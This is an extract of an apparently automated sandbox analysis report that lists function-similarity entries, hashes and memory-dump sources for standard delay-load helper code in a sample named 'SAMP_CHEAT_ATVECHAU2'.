                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: cc0e1cff1be51c928053efee3441bb6836d6402082094fc9e58678cf5f7f0b0f
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: cc0e1cff1be51c928053efee3441bb6836d6402082094fc9e58678cf5f7f0b0f
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: e12ca535399d09ed3bb94a97afbf882011c51a6dc9a3fcd7f1d1cdf60aef718b
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: e12ca535399d09ed3bb94a97afbf882011c51a6dc9a3fcd7f1d1cdf60aef718b
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 31d02682ecaf792777bea12362f7796985d64106322240d1f3f8642d9f307f01
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 31d02682ecaf792777bea12362f7796985d64106322240d1f3f8642d9f307f01
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E1E3
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 75f7ce35e7c240f9fb60a6a6973803224ae3c53d36465f81dd476ee98a3490d6
                                                    • Instruction ID: 285da4e9c01fbdd70e73737f25e3acefa37dfd57172c691e63b3708a3eb8bd5e
                                                    • Opcode Fuzzy Hash: 75f7ce35e7c240f9fb60a6a6973803224ae3c53d36465f81dd476ee98a3490d6
                                                    • Instruction Fuzzy Hash: 30A001E6AAD652BCB109A2526D06E3B031DC4D5B653319D2EF86AC44C1A8A0AC4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 7b820466728d3fc3caca927b6fffa6961f46b97bd7929f3e8565a10cce5b8635
                                                    • Instruction ID: 18de05b4b2f137f832524e3e1e482b7caeaf9eda413850b7e191df696e429b65
                                                    • Opcode Fuzzy Hash: 7b820466728d3fc3caca927b6fffa6961f46b97bd7929f3e8565a10cce5b8635
                                                    • Instruction Fuzzy Hash: 33A001E62A95627DB10862526D06E3B471ED4D2B2A330A92EF869A54D1AC805C4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0a9b84df483e11a286353e7f07e70b03c5bebd2b0294d89993675082f6cccd1f
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 0a9b84df483e11a286353e7f07e70b03c5bebd2b0294d89993675082f6cccd1f
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9231737cc552420b0864ea00d93ee1820acda4531956f2ff8829e3137b7d8517
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 9231737cc552420b0864ea00d93ee1820acda4531956f2ff8829e3137b7d8517
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 44a74193c1b6142f1f767f7f318b0712a377f45dfd3d7a359e5f474db6ecd453
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 44a74193c1b6142f1f767f7f318b0712a377f45dfd3d7a359e5f474db6ecd453
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6134fe4d0dbcf667e6ce7d9c9ef666be374d4782f19907eb856b6667b1c4d3e9
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 6134fe4d0dbcf667e6ce7d9c9ef666be374d4782f19907eb856b6667b1c4d3e9
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E3FC
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 6aadc7d140b2cf2ba45d28784829cc7d365d3e2390a0d5150ed0d19fb56623ac
                                                    • Instruction ID: a4dd33608c72a47f1260db2d94c0e4cb4bfc6f80975f6ae0e1bab11907e6920f
                                                    • Opcode Fuzzy Hash: 6aadc7d140b2cf2ba45d28784829cc7d365d3e2390a0d5150ed0d19fb56623ac
                                                    • Instruction Fuzzy Hash: 53A001E62A9562BCB10862526D06E3B471ED4D6B66330AD2EF86A954D1A8805C4918B2
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 25e3b3c2d1ee51b80814517a2dce95cb51b5fab0cc783280bba55f660eba5f32
                                                    • Instruction ID: 3d26324bd879bb589eb6b73a5f1c5c351f513edf538c70c967a5d5c9d3f44a95
                                                    • Opcode Fuzzy Hash: 25e3b3c2d1ee51b80814517a2dce95cb51b5fab0cc783280bba55f660eba5f32
                                                    • Instruction Fuzzy Hash: 49A001D66AE562BCB11862A17D0AE3B031EC4D5B6A331AE2EF89A854D1A8805C5918B1
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 760d5defeb26d332e354e51b46cadc5abd6532a61466affbef124b268db59a13
                                                    • Instruction ID: 3d26324bd879bb589eb6b73a5f1c5c351f513edf538c70c967a5d5c9d3f44a95
                                                    • Opcode Fuzzy Hash: 760d5defeb26d332e354e51b46cadc5abd6532a61466affbef124b268db59a13
                                                    • Instruction Fuzzy Hash: 49A001D66AE562BCB11862A17D0AE3B031EC4D5B6A331AE2EF89A854D1A8805C5918B1
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 5b717c43b4d14de5b58b158ff3af00fa70eef390b7961ab4b193f001eb8fbdaf
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 5b717c43b4d14de5b58b158ff3af00fa70eef390b7961ab4b193f001eb8fbdaf
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 0ddf3a404a69780ee463a279f557c5e1ec17a06547f67d63b4f1f7786898f9cb
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 0ddf3a404a69780ee463a279f557c5e1ec17a06547f67d63b4f1f7786898f9cb
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 25d453d0bb435aca4588fe18c56d5219f05d0385b6b407872265e1c09ff53a41
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 25d453d0bb435aca4588fe18c56d5219f05d0385b6b407872265e1c09ff53a41
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E580
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 738ef2d2e414cdeab42991274572c70c900ce2ef90503fcd63905f3332b19fd3
                                                    • Instruction ID: 50f2666aed8be681b9a7c4db52f6cfbc147b5de020e9a3c92609a53a019087d5
                                                    • Opcode Fuzzy Hash: 738ef2d2e414cdeab42991274572c70c900ce2ef90503fcd63905f3332b19fd3
                                                    • Instruction Fuzzy Hash: C6A011C22AA0203CB00822A03C0AE3B030EC0E0B2A330AE2EF888800C0A8800C0808B0
                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00D0E51F
                                                      • Part of subcall function 00D0E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D0E8D0
                                                      • Part of subcall function 00D0E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D0E8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
